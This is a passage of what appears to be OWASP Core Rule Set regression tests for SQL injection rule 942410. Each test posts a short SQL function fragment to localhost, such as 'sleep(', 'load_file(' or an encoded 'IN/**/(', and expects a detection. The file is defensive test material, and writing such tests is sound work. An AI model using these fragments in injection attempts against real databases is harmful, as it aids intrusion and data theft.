text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "database (" + version: HTTP/1.0 + output: + log_contains: id "942410" + - test_id: 21 + desc: "SQL Injection Attack" + stages: + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "date(" + version: HTTP/1.0 + output: + log_contains: id "942410" + - test_id: 22 + desc: "SQL Injection Attack" + stages: + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "pay=date%5D%3D%28" + version: HTTP/1.0 + output: + log_contains: id "942410" + - test_id: 23 + desc: "SQL Injection Attack" + stages: + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "pay=day.+%28" + version: HTTP/1.0 + output: + log_contains: id "942410" + - test_id: 24 + desc: "SQL Injection Attack" + stages: + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "pay=day%26%27%28" + version: HTTP/1.0 + output: + log_contains: id "942410" + - test_id: 25 + desc: "SQL Injection Attack" + stages: + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: 
text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "pay=decode%28" + version: HTTP/1.0 + output: + log_contains: id "942410" + - test_id: 26 + desc: "SQL Injection Attack" + stages: + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "pay=default%28" + version: HTTP/1.0 + output: + log_contains: id "942410" + - test_id: 27 + desc: "SQL Injection Attack" + stages: + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "pay=ELT%28" + version: HTTP/1.0 + output: + log_contains: id "942410" + - test_id: 28 + desc: "SQL Injection Attack" + stages: + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "pay=encode%3D%28" + version: HTTP/1.0 + output: + log_contains: id "942410" + - test_id: 29 + desc: "SQL Injection Attack" + stages: + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "pay=ExtractValue%28" + version: HTTP/1.0 + output: + log_contains: id "942410" + - test_id: 30 + desc: "SQL Injection Attack" + stages: + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: 
text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "pay=EXTRACTVALUE%28" + version: HTTP/1.0 + output: + log_contains: id "942410" + - test_id: 31 + desc: "SQL Injection Attack" + stages: + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "pay=floor%28" + version: HTTP/1.0 + output: + log_contains: id "942410" + - test_id: 32 + desc: "SQL Injection Attack" + stages: + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "pay=FLOOR+%28" + version: HTTP/1.0 + output: + log_contains: id "942410" + - test_id: 33 + desc: "SQL Injection Attack" + stages: + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "pay=format%28" + version: HTTP/1.0 + output: + log_contains: id "942410" + - test_id: 34 + desc: "SQL Injection Attack" + stages: + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "pay=GROUP_CONCAT%28" + version: HTTP/1.0 + output: + log_contains: id "942410" + - test_id: 35 + desc: "SQL Injection Attack" + stages: + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: 
text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "pay=hex%28" + version: HTTP/1.0 + output: + log_contains: id "942410" + - test_id: 36 + desc: "SQL Injection Attack" + stages: + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "pay=hEx%28" + version: HTTP/1.0 + output: + log_contains: id "942410" + - test_id: 37 + desc: "SQL Injection Attack" + stages: + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "pay=if+%21%28" + version: HTTP/1.0 + output: + log_contains: id "942410" + - test_id: 38 + desc: "SQL Injection Attack" + stages: + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "pay=if+%28" + version: HTTP/1.0 + output: + log_contains: id "942410" + - test_id: 39 + desc: "SQL Injection Attack" + stages: + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "pay=if%28" + version: HTTP/1.0 + output: + log_contains: id "942410" + - test_id: 40 + desc: "SQL Injection Attack" + stages: + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: 
text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "pay=if%5C%28" + version: HTTP/1.0 + output: + log_contains: id "942410" + - test_id: 41 + desc: "SQL Injection Attack" + stages: + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "pay=IFNULL%28" + version: HTTP/1.0 + output: + log_contains: id "942410" + - test_id: 42 + desc: "SQL Injection Attack" + stages: + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "pay=in+%27%24%28" + version: HTTP/1.0 + output: + log_contains: id "942410" + - test_id: 43 + desc: "SQL Injection Attack" + stages: + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "pay=IN+%28" + version: HTTP/1.0 + output: + log_contains: id "942410" + - test_id: 44 + desc: "SQL Injection Attack" + stages: + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "pay=IN%2F%2A%2A%2F%28" + version: HTTP/1.0 + output: + log_contains: id "942410" + - test_id: 45 + desc: "SQL Injection Attack" + stages: + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: 
text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "pay=insert%28" + version: HTTP/1.0 + output: + log_contains: id "942410" + - test_id: 46 + desc: "SQL Injection Attack" + stages: + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "pay=left%27%29%3F%24%28" + version: HTTP/1.0 + output: + log_contains: id "942410" + - test_id: 47 + desc: "SQL Injection Attack" + stages: + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "pay=LEFT%28" + version: HTTP/1.0 + output: + log_contains: id "942410" + - test_id: 48 + desc: "SQL Injection Attack" + stages: + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "pay=length%7C%7C%21%21%24%28" + version: HTTP/1.0 + output: + log_contains: id "942410" + - test_id: 49 + desc: "SQL Injection Attack" + stages: + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "pay=length%7C%7C%28" + version: HTTP/1.0 + output: + log_contains: id "942410" + - test_id: 50 + desc: "SQL Injection Attack" + stages: + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: 
text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "pay=length%3F%28" + version: HTTP/1.0 + output: + log_contains: id "942410" + - test_id: 51 + desc: "SQL Injection Attack" + stages: + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "pay=length%26%26%21%21%21%24%28" + version: HTTP/1.0 + output: + log_contains: id "942410" + - test_id: 52 + desc: "SQL Injection Attack" + stages: + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "pay=length%26%26%28" + version: HTTP/1.0 + output: + log_contains: id "942410" + - test_id: 53 + desc: "SQL Injection Attack" + stages: + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "pay=LENGTH%28" + version: HTTP/1.0 + output: + log_contains: id "942410" + - test_id: 54 + desc: "SQL Injection Attack" + stages: + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "pay=ln+%28" + version: HTTP/1.0 + output: + log_contains: id "942410" + - test_id: 55 + desc: "SQL Injection Attack" + stages: + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: 
text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "pay=ln%29+%28" + version: HTTP/1.0 + output: + log_contains: id "942410" + - test_id: 56 + desc: "SQL Injection Attack" + stages: + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "pay=load_file%28" + version: HTTP/1.0 + output: + log_contains: id "942410" + - test_id: 57 + desc: "SQL Injection Attack" + stages: + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "pay=local%28" + version: HTTP/1.0 + output: + log_contains: id "942410" + - test_id: 58 + desc: "SQL Injection Attack" + stages: + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "pay=log%28" + version: HTTP/1.0 + output: + log_contains: id "942410" + - test_id: 59 + desc: "SQL Injection Attack" + stages: + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "pay=log%26%26%28" + version: HTTP/1.0 + output: + log_contains: id "942410" + - test_id: 60 + desc: "SQL Injection Attack" + stages: + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: 
text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "pay=lower%28" + version: HTTP/1.0 + output: + log_contains: id "942410" + - test_id: 61 + desc: "SQL Injection Attack" + stages: + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "pay=MAKE_SET%28" + version: HTTP/1.0 + output: + log_contains: id "942410" + - test_id: 62 + desc: "SQL Injection Attack" + stages: + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "pay=MAX%28" + version: HTTP/1.0 + output: + log_contains: id "942410" + - test_id: 63 + desc: "SQL Injection Attack" + stages: + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "pay=md5%28" + version: HTTP/1.0 + output: + log_contains: id "942410" + - test_id: 64 + desc: "SQL Injection Attack" + stages: + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "pay=md5%5C%28" + version: HTTP/1.0 + output: + log_contains: id "942410" + - test_id: 65 + desc: "SQL Injection Attack" + stages: + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: 
text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "pay=MID%28" + version: HTTP/1.0 + output: + log_contains: id "942410" + - test_id: 66 + desc: "SQL Injection Attack" + stages: + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "pay=minute+%28" + version: HTTP/1.0 + output: + log_contains: id "942410" + - test_id: 67 + desc: "SQL Injection Attack" + stages: + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "pay=month%3D%28" + version: HTTP/1.0 + output: + log_contains: id "942410" + - test_id: 68 + desc: "SQL Injection Attack" + stages: + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "name_const(" + version: HTTP/1.0 + output: + log_contains: id "942410" + - test_id: 69 + desc: "SQL Injection Attack" + stages: + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "now(" + version: HTTP/1.0 + output: + log_contains: id "942410" + - test_id: 70 + desc: "SQL Injection Attack" + stages: + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: 
text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "nOW(" + version: HTTP/1.0 + output: + log_contains: id "942410" + - test_id: 71 + desc: "SQL Injection Attack" + stages: + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "ord(" + version: HTTP/1.0 + output: + log_contains: id "942410" + - test_id: 72 + desc: "SQL Injection Attack" + stages: + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "password?(" + version: HTTP/1.0 + output: + log_contains: id "942410" + - test_id: 73 + desc: "SQL Injection Attack" + stages: + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "password/?(" + version: HTTP/1.0 + output: + log_contains: id "942410" + - test_id: 74 + desc: "SQL Injection Attack" + stages: + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "Password>$(" + version: HTTP/1.0 + output: + log_contains: id "942410" + - test_id: 75 + desc: "SQL Injection Attack" + stages: + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: 
text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "pg_sleep(" + version: HTTP/1.0 + output: + log_contains: id "942410" + - test_id: 76 + desc: "SQL Injection Attack" + stages: + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "pi(" + version: HTTP/1.0 + output: + log_contains: id "942410" + - test_id: 77 + desc: "SQL Injection Attack" + stages: + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "PI(" + version: HTTP/1.0 + output: + log_contains: id "942410" + - test_id: 78 + desc: "SQL Injection Attack" + stages: + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "pow(" + version: HTTP/1.0 + output: + log_contains: id "942410" + - test_id: 79 + desc: "SQL Injection Attack" + stages: + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "POW(" + version: HTTP/1.0 + output: + log_contains: id "942410" + - test_id: 80 + desc: "SQL Injection Attack" + stages: + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: 
text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
+ method: POST
+ port: 80
+ uri: "/post"
+ data: "quarter. ("
+ version: HTTP/1.0
+ output:
+ log_contains: id "942410"
+ - test_id: 81
+ desc: "SQL Injection Attack"
+ stages:
+ - input:
+ dest_addr: 127.0.0.1
+ headers:
+ Host: localhost
+ User-Agent: "OWASP CRS test agent"
+ Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
+ method: POST
+ port: 80
+ uri: "/post"
+ data: "rand("
+ version: HTTP/1.0
+ output:
+ log_contains: id "942410"
+ - test_id: 82
+ desc: "SQL Injection Attack"
+ stages:
+ - input:
+ dest_addr: 127.0.0.1
+ headers:
+ Host: localhost
+ User-Agent: "OWASP CRS test agent"
+ Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
+ method: POST
+ port: 80
+ uri: "/post"
+ data: "Rand ("
+ version: HTTP/1.0
+ output:
+ log_contains: id "942410"
+ - test_id: 83
+ desc: "SQL Injection Attack"
+ stages:
+ - input:
+ dest_addr: 127.0.0.1
+ headers:
+ Host: localhost
+ User-Agent: "OWASP CRS test agent"
+ Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
+ method: POST
+ port: 80
+ uri: "/post"
+ data: "RAND("
+ version: HTTP/1.0
+ output:
+ log_contains: id "942410"
+ - test_id: 84
+ desc: "SQL Injection Attack"
+ stages:
+ - input:
+ dest_addr: 127.0.0.1
+ headers:
+ Host: localhost
+ User-Agent: "OWASP CRS test agent"
+ Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
+ method: POST
+ port: 80
+ uri: "/post"
+ data: "replace("
+ version: HTTP/1.0
+ output:
+ log_contains: id "942410"
+ - test_id: 85
+ desc: "SQL Injection Attack"
+ stages:
+ - input:
+ dest_addr: 127.0.0.1
+ headers:
+ Host: localhost
+ User-Agent: "OWASP CRS test agent"
+ Accept: 
text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
+ method: POST
+ port: 80
+ uri: "/post"
+ data: "REPLACE("
+ version: HTTP/1.0
+ output:
+ log_contains: id "942410"
+ - test_id: 86
+ desc: "SQL Injection Attack"
+ stages:
+ - input:
+ dest_addr: 127.0.0.1
+ headers:
+ Host: localhost
+ User-Agent: "OWASP CRS test agent"
+ Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
+ method: POST
+ port: 80
+ uri: "/post"
+ data: "round ("
+ version: HTTP/1.0
+ output:
+ log_contains: id "942410"
+ - test_id: 87
+ desc: "SQL Injection Attack"
+ stages:
+ - input:
+ dest_addr: 127.0.0.1
+ headers:
+ Host: localhost
+ User-Agent: "OWASP CRS test agent"
+ Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
+ method: POST
+ port: 80
+ uri: "/post"
+ data: "round("
+ version: HTTP/1.0
+ output:
+ log_contains: id "942410"
+ - test_id: 88
+ desc: "SQL Injection Attack"
+ stages:
+ - input:
+ dest_addr: 127.0.0.1
+ headers:
+ Host: localhost
+ User-Agent: "OWASP CRS test agent"
+ Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
+ method: POST
+ port: 80
+ uri: "/post"
+ data: "rtrim("
+ version: HTTP/1.0
+ output:
+ log_contains: id "942410"
+ - test_id: 89
+ desc: "SQL Injection Attack"
+ stages:
+ - input:
+ dest_addr: 127.0.0.1
+ headers:
+ Host: localhost
+ User-Agent: "OWASP CRS test agent"
+ Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
+ method: POST
+ port: 80
+ uri: "/post"
+ data: "RTRIM("
+ version: HTTP/1.0
+ output:
+ log_contains: id "942410"
+ - test_id: 90
+ desc: "SQL Injection Attack"
+ stages:
+ - input:
+ dest_addr: 127.0.0.1
+ headers:
+ Host: localhost
+ User-Agent: "OWASP CRS test agent"
+ Accept: 
text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
+ method: POST
+ port: 80
+ uri: "/post"
+ data: "pay=sin ("
+ version: HTTP/1.0
+ output:
+ log_contains: id "942410"
+ - test_id: 91
+ desc: "SQL Injection Attack"
+ stages:
+ - input:
+ dest_addr: 127.0.0.1
+ headers:
+ Host: localhost
+ User-Agent: "OWASP CRS test agent"
+ Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
+ method: POST
+ port: 80
+ uri: "/post"
+ data: "SIN("
+ version: HTTP/1.0
+ output:
+ log_contains: id "942410"
+ - test_id: 92
+ desc: "SQL Injection Attack"
+ stages:
+ - input:
+ dest_addr: 127.0.0.1
+ headers:
+ Host: localhost
+ User-Agent: "OWASP CRS test agent"
+ Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
+ method: POST
+ port: 80
+ uri: "/post"
+ data: "pay=sleep("
+ version: HTTP/1.0
+ output:
+ log_contains: id "942410"
+ - test_id: 93
+ desc: "SQL Injection Attack"
+ stages:
+ - input:
+ dest_addr: 127.0.0.1
+ headers:
+ Host: localhost
+ User-Agent: "OWASP CRS test agent"
+ Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
+ method: POST
+ port: 80
+ uri: "/post"
+ data: "SLEEP ("
+ version: HTTP/1.0
+ output:
+ log_contains: id "942410"
+ - test_id: 94
+ desc: "SQL Injection Attack"
+ stages:
+ - input:
+ dest_addr: 127.0.0.1
+ headers:
+ Host: localhost
+ User-Agent: "OWASP CRS test agent"
+ Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
+ method: POST
+ port: 80
+ uri: "/post"
+ data: "pay=strcmp("
+ version: HTTP/1.0
+ output:
+ log_contains: id "942410"
+ - test_id: 95
